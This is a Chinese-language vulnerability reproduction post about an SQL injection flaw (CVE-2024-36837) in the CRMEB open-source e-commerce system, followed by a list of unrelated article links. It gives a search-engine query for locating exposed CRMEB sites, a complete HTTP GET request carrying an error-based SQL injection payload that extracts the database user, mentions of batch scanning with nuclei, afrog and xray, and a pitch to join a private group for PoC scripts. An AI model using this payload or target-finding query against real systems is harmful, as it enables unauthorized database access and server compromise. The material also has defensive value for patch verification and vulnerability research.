当前位置: 首页 > news >正文

【漏洞复现】CRMEB开源电商系统 /api/products SQL注入漏洞(CVE-2024-36837)

0x01 产品简介

CRMEB开源电商系统是一款由西安众邦网络科技有限公司打造的全栈式电商解决方案,旨在为开发者和商家提供高性能、智能化的电商平台服务。该系统集成了CRM(客户关系管理)、ERP(企业资源规划)和EB(电子商务)的功能,通过深度结合这些功能,帮助用户快速构建稳定且功能丰富的在线商城。是一款全开源可商用的系统,前后端分离开发,全部100%开源,在小程序、公众号、H5、APP、PC端都能用,使用方便,二开方便!安装使用也很简单!使用文档、接口文档、数据字典、二开文档、视频教程,各种资料应有尽有,就算你是技术小白,也能轻松上手!

0x02 漏洞概述

2024年6月,CRMEB开源电商系统发布了新补丁,发布了新补丁,修复了一处 SQL注入漏洞(CVE-2024-36837)。经分析,该漏洞可以通过请求api的路径接口来进行SQL注入,进而可能导致敏感信息泄露,该注入可暴露后台web绝对路径,深入利用可获取服务器权限,该漏洞无前置条件且利用简单,建议受影响的用户尽快修复漏洞。

0x03 搜索语法

body="/wap/first/zsff/iconfont/iconfont.css" || body="CRMEB"

在这里插入图片描述

0x04 漏洞复现

GET /api/products?limit=20&priceOrder=&salesOrder=&selectId=GTID_SUBSET(CONCAT(0x7e,(SELECT+(ELT(3550=3550,user()))),0x7e),3550) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

在这里插入图片描述

0x05 工具批量

nuclei

在这里插入图片描述

afrog

在这里插入图片描述

xray

在这里插入图片描述

POC脚本获取

请使用VX扫一扫加入内部POC脚本分享圈子
在这里插入图片描述

http://www.lryc.cn/news/375980.html

相关文章:

  • 摄像头图像矫正的表格生成方法
  • 【Arc gis】Arc gis出现ERROR 999999问题的解决办法
  • 优化 Flutter 应用开发:探索 ViewModel 的威力
  • Android开发系列(四)Jetpack Compose之Button
  • Java17 --- RabbitMQ之插件使用
  • 6.18总结
  • 【ARM Cache 及 MMU 系列文章 1.4 -- 如何判断 L3 Cache 是否实现?】
  • 打印mybatis的sql日志
  • QT day4(对话框 事件机制)
  • 序列化与反序列化漏洞实例
  • 6、while循环 - 习题解析
  • ReentrantLock可重入锁
  • 如何秒杀系统架构设计
  • 深度神经网络——什么是降维?
  • SpringMVC—RequestMapping注解
  • Java线程池基本概念
  • 智能车联网安全发展形势、挑战
  • AWS概述
  • MySQL常见面试题自测
  • c语言回顾-函数递归
  • 消息队列-RabbitMQ-延时队列实现
  • 【热门开源项目推荐】满足不同程序员的需求与关注点
  • 一文理清GO语言日志库实现开发项目中的日志功能(rotatelogs/zap分析)
  • 【Go语言精进之路】构建高效Go程序:了解string实现原理并高效使用
  • HDFS 常见命令
  • 示例:WPF中应用Grid的SharedSizeGroup设置整齐的布局
  • React的form表单自定义校验规则
  • 一种新的一维时间序列信号盲解卷积算法(以旋转机械故障诊断为例,MATLAB环境)
  • 618电商是社区网站入局的好时机吗?
  • 不知道密码,一样能卸载瑞星esm防病毒终端安全防护系统